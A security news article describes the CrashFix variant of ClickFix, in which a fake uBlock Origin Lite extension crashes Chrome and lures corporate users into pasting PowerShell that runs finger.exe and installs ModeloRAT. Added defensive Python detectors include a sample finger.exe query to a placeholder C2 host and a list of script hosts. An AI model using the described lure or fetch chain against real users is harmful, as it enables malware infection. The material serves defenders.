A recent variant of the ClickFix attack relies on a malicious Chrome extension to display a security warning and lure victims into executing unwanted commands that install malware, Huntress reports.
Dubbed CrashFix, the attack starts with the NexShield browser extension, which impersonates the legitimate uBlock Origin Lite ad blocker.
The extension displays a fake security warning instructing the victim to fix allegedly identified issues by opening the Windows Run dialog and pasting content from the clipboard.
Just as in the classic ClickFix attacks, NexShield silently copies malicious PowerShell commands to the clipboard, masquerading as a repair command, designed to infect the victim’s system with ModeloRAT.
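The lure above combines two properties a defender can triage from an installed extension's manifest: branding borrowed from another project, and the ability to write the clipboard. The following Python is an added example, not code from the article or from Huntress. It assumes the borrowed uBlock Origin Lite branding is visible in the manifest text and that clipboard writes are declared through the `clipboardWrite` permission; both manifests embedded in it are constructed sample data, and the profile path is the standard Chrome location on Windows.

```python
"""
Heuristic triage of Chrome extension manifests for the lure described above.
Added example; assumptions: impersonated branding appears in the manifest's
description, and clipboard writes are declared via "clipboardWrite".
"""
from __future__ import annotations

import json
import os
from pathlib import Path

SUSPECT_MANIFEST = json.dumps({  # constructed sample mirroring the described behaviour
    "manifest_version": 3,
    "name": "NexShield",
    "description": "Lightweight ad blocker based on uBlock Origin Lite",
    "version": "1.0.0",
    "permissions": ["clipboardWrite", "storage"],
    "host_permissions": ["<all_urls>"],
})

BENIGN_MANIFEST = json.dumps({  # constructed control case
    "manifest_version": 3,
    "name": "Tab Counter",
    "description": "Shows how many tabs are open",
    "version": "2.1.0",
    "permissions": ["tabs"],
})

# Brand strings a look-alike might borrow; extend with whatever your fleet trusts.
BORROWED_BRANDS = ("ublock origin", "ublock")


def triage_manifest(raw_manifest: str) -> list[str]:
    """Return heuristic findings for one manifest.json document."""
    m = json.loads(raw_manifest)
    name = str(m.get("name", "")).lower()
    blurb = " ".join(str(m.get(k, "")) for k in ("short_name", "description")).lower()
    perms = set(m.get("permissions", [])) | set(m.get("optional_permissions", []))
    hosts = set(m.get("host_permissions", []))
    findings: list[str] = []

    # Another project's brand in the description while the name differs is
    # the impersonation pattern the article describes.
    if any(b in blurb for b in BORROWED_BRANDS) and not any(b in name for b in BORROWED_BRANDS):
        findings.append("borrowed-brand-in-description")

    # Clipboard write access is the capability a ClickFix-style lure relies on.
    if "clipboardWrite" in perms:
        findings.append("clipboard-write-permission")

    # Access to every site is worth noting on any extension that also writes the clipboard.
    if "<all_urls>" in hosts:
        findings.append("all-urls-host-permission")

    return findings


def installed_manifests(profile_dir: Path | None = None):
    """Yield (extension id, manifest text) for a Chrome profile on Windows.

    Defaults to the standard Chrome "Default" profile; yields nothing if the
    directory does not exist, so the module runs offline on any platform.
    """
    if profile_dir is None:
        profile_dir = Path(os.environ.get("LOCALAPPDATA", "")) / "Google/Chrome/User Data/Default"
    for manifest in profile_dir.glob("Extensions/*/*/manifest.json"):
        yield manifest.parents[1].name, manifest.read_text(encoding="utf-8")


if __name__ == "__main__":
    for ext_id, text in installed_manifests():
        hits = triage_manifest(text)
        if hits:
            print(ext_id, hits)
```

None of these signals is proof on its own; legitimate extensions request `clipboardWrite` and `<all_urls>` too. The value is in the combination, and in comparing the extension ID against the IDs of the projects the fleet actually trusts.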
However, only domain-joined hosts are infected, meaning that the threat actor behind the campaign, dubbed KongTuke and active since at least early 2025, is targeting corporate environments.
The core malicious functionality of NexShield, Huntress explains, is a denial-of-service (DoS) attack against the victim’s browser, setting the stage for the CrashFix social engineering technique.
The extension executes a function that attempts to iterate 1 billion times, creating a chrome.runtime port connection with each iteration. Once it completes the iterations, it starts again, in an infinite loop.
This exhausts system resources and causes the browser to become unresponsive and crash. If the browser is restarted, the fake security warning triggering the CrashFix attack is displayed.
To avoid raising user suspicion, NexShield sets a timer so that the malicious behavior is triggered 60 minutes after installation. The DoS attack begins 10 minutes later and is executed every 10 minutes, but only against users for whom the extension has sent a user ID to the command-and-control (C&C) server.
A focus on enterprise environments
The malicious command that victims run in a CrashFix attack leads to the execution of the legitimate Windows utility Finger.exe, which can retrieve information about users on remote systems.
The command also retrieves a secondary payload that fetches and executes malicious code from a remote server, installing the fully-featured Python-based ModeloRAT remote access trojan on domain-joined systems.
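The execution chain just described leaves a distinctive trail in process telemetry: a script host launched from the Run dialog (explorer.exe is its parent), followed by the legitimate finger.exe querying a remote host. The following Python is an added example, not code from the article or from Huntress, that runs simple detection heuristics over constructed Sysmon-style process-creation events. The hostnames, the PowerShell payload and the finger.exe argument are placeholders; the `[user]@host` form is finger's documented query syntax.

```python
"""
Detection heuristics for the CrashFix execution chain: a command pasted into
the Windows Run dialog that ends up running finger.exe against a remote host.
Added example; the events below are constructed records, not Huntress telemetry.
"""
from __future__ import annotations

# Constructed sample events. Hostnames and the PowerShell payload are placeholders.
SAMPLE_EVENTS = [
    {  # what the Run dialog produces: explorer.exe spawning powershell.exe
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -NoProfile -Command <constructed placeholder>",
    },
    {  # the script host invoking finger.exe with a user@host query
        "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "image": r"C:\Windows\System32\finger.exe",
        "command_line": "finger.exe update@c2.example.invalid",
    },
    {  # benign activity for comparison
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\notepad.exe",
        "command_line": "notepad.exe notes.txt",
    },
]

# Interpreters a pasted ClickFix command typically runs under.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list[str]:
    """Return the list of heuristic findings for one process-creation event."""
    image = _basename(event["image"])
    parent = _basename(event["parent_image"])
    args = event["command_line"].split()[1:]
    findings: list[str] = []

    # finger.exe queries a remote host as "[user]@host"; that is rare on
    # enterprise endpoints and is the LOLBin step the article describes.
    if image == "finger.exe":
        if any("@" in a for a in args):
            findings.append("finger-remote-query")
        if parent in SCRIPT_HOSTS:
            findings.append("finger-spawned-by-script-host")

    # explorer.exe as the parent of a script host is what a command typed
    # into the Run dialog (Win+R) looks like in process telemetry.
    if image in SCRIPT_HOSTS and parent == "explorer.exe":
        findings.append("script-host-from-explorer")

    return findings


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Run evaluate() over a batch and return (event index, finding) pairs."""
    return [(i, f) for i, ev in enumerate(events) for f in evaluate(ev)]


if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

The finger.exe signals are high-confidence on most fleets, since the utility is almost never used legitimately; the explorer-to-script-host signal is noisier (administrators open cmd.exe from Win+R all the time) and is best used to enrich a finger.exe alert rather than to alert on its own.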
The RAT performs system reconnaissance, establishes persistence, and supports command execution. It also features adaptive C&C beaconing, obfuscation, two-layered encryption, and anti-analysis capabilities.
According to Huntress, the malware operator appears focused on compromising corporate environments to gain access to Active Directory, internal resources, and sensitive data. Thus, ModeloRAT is not served to home users (an infection mechanism for hosts that aren’t domain-joined has not been implemented in CrashFix).
“KongTuke’s CrashFix campaign demonstrates how threat actors continue to evolve their social engineering tactics. By impersonating a trusted open-source project (uBlock Origin Lite), crashing the user’s browser on purpose, and then offering a fake fix, they’ve built a self-sustaining infection loop that preys on user frustration,” Huntress notes.
